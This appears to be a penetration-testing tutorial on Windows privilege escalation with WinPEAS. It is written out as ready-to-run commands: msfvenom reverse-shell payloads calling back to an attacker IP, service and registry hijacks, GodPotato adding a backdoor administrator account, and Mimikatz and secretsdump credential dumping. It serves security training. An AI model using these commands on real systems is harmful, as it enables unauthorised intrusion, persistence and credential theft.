Privilege escalation on Windows is the art of moving from a low-privileged user account to SYSTEM or Administrator. It’s a critical phase of every penetration test and one of the skills that separates junior from senior operators. Windows has a rich attack surface for privilege escalation — misconfigured services, weak ACLs, unquoted paths, token abuse, and credential reuse are all common findings in real engagements. This guide covers the key techniques and the automation tool that finds them: WinPEAS.
Setting Up: WinPEAS
WinPEAS (Windows Privilege Escalation Awesome Script) is the Windows equivalent of LinPEAS. Download it from the PEASS-ng GitHub repository:
# Download to target (if outbound web access is available)
Invoke-WebRequest -Uri "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe" -OutFile winPEAS.exe
# Or transfer from your Kali machine via a Python HTTP server
# Kali: python3 -m http.server 8080
# Target: Invoke-WebRequest -Uri "http://10.10.10.1:8080/winPEASx64.exe" -OutFile winPEAS.exe
Run it with color-coded output (requires a compatible terminal):
winPEAS.exe
winPEAS.exe quiet # Suppress banner
winPEAS.exe systeminfo # Only system info checks
winPEAS.exe servicesinfo # Only service checks
WinPEAS checks hundreds of escalation vectors and highlights findings in red (critical), yellow (interesting), and blue (informational). Work through the red findings first.
Technique 1: Unquoted Service Paths
When a Windows service executable path contains spaces and is not wrapped in quotes, the Service Control Manager tries to execute each space-separated segment as a binary. This can be hijacked.
Identify vulnerable services:
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Or with PowerShell:
Get-WmiObject Win32_Service | Where-Object {
$_.PathName -notmatch '"' -and $_.PathName -match ' ' -and $_.StartMode -eq 'Auto'
} | Select-Object Name, PathName
Example vulnerable path:
C:\Program Files\Vulnerable App\service.exe
Windows tries to execute:
C:\Program.exeC:\Program Files\Vulnerable.exeC:\Program Files\Vulnerable App\service.exe
If you can write to C:\Program Files\, place a malicious Vulnerable.exe there. When the service restarts, your binary runs as SYSTEM.
Generate a payload with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe -o Vulnerable.exe
Technique 2: Weak Service Permissions
If you have permission to modify a service’s binary path, you can point it to your payload.
Check service permissions with AccessChk:
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
Look for services where low-privilege users have SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS.
Exploit with sc.exe:
sc config VulnerableService binPath= "C:\Users\user\AppData\Local\Temp\shell.exe"
sc stop VulnerableService
sc start VulnerableService
Technique 3: Weak Registry ACLs on Services
Service configuration is stored in HKLM\SYSTEM\CurrentControlSet\Services\. If a low-privileged user has write access to a service’s registry key, they can modify ImagePath to point to a payload.
# Check registry ACLs
Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService" | Format-List
Exploit:
reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService" /v ImagePath /t REG_EXPAND_SZ /d "C:\shell.exe" /f
Technique 4: AlwaysInstallElevated
If two registry keys are both set to 1, any user can install MSI packages as SYSTEM:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If both return 0x1:
# Generate a malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o shell.msi
# Install it on the target
msiexec /quiet /qn /i shell.msi
Technique 5: Token Impersonation (Potato Attacks)
Windows tokens represent security contexts. Certain Windows privileges — SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege — allow a process to impersonate a token belonging to another user, including SYSTEM.
These privileges are held by many service accounts (IIS, MSSQL, network services). If you have a shell running as one of these accounts, you likely have impersonation rights.
Check your current privileges:
whoami /priv
Exploit with PrintSpoofer (Windows 10/Server 2016-2019):
PrintSpoofer.exe -i -c cmd.exe
Exploit with GodPotato (works on most Windows versions):
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net user hacker Password123! /add && net localgroup administrators hacker /add"
Exploit with RoguePotato or SweetPotato depending on the target OS version. The PEASS team maintains a table of which potato works on which Windows version.
Technique 6: Stored Credentials
WinPEAS automatically checks for stored credentials. Do it manually too:
# Saved Windows credentials
cmdkey /list
# Use stored credentials
runas /savecred /user:DOMAIN\Administrator cmd.exe
# Autologon credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Unattend.xml files (post-deployment cleanup failures)
dir /s /b C:\*.xml 2>nul | findstr /i "unattend sysprep"
Configuration files, scripts, and log files frequently contain hardcoded credentials. WinPEAS searches common locations automatically.
Technique 7: Scheduled Tasks
Scheduled tasks running as SYSTEM with weak file ACLs on the executable or a writable script path are prime escalation targets:
Get-ScheduledTask | Where-Object {$_.Principal.RunLevel -eq "Highest"} | Select-Object TaskName, TaskPath
For each interesting task, check the file permissions on the executable it runs:
icacls "C:\path\to\scheduled\task.exe"
If BUILTIN\Users:(M) or similar appears, you can replace the binary.
Technique 8: DLL Hijacking
When an executable loads a DLL, Windows searches directories in order. If you can write to an earlier directory in the search path, you can place a malicious DLL there.
Find DLL hijacking opportunities with Process Monitor (Sysinternals) — filter for NAME NOT FOUND results for .dll extensions in writable directories.
# Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f dll -o hijack.dll
Rename it to the expected DLL name and place it in the writable directory.
Once you have SYSTEM, dump credentials for persistence and lateral movement:
# Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" exit
# Impacket secretsdump (remote, from Kali)
python3 secretsdump.py CORP/Administrator:Password123@192.168.1.10
Conclusion
Windows privilege escalation rarely requires a zero-day. Real environments are full of misconfigurations — unquoted paths, overpermissioned services, stored credentials, and impersonation rights on service accounts. WinPEAS automates the discovery phase, but understanding what each finding means and how to exploit it separates a tool user from a skilled operator. Practice these techniques on platforms like HackTheBox, TryHackMe, and dedicated Windows privesc labs to build muscle memory before your next engagement.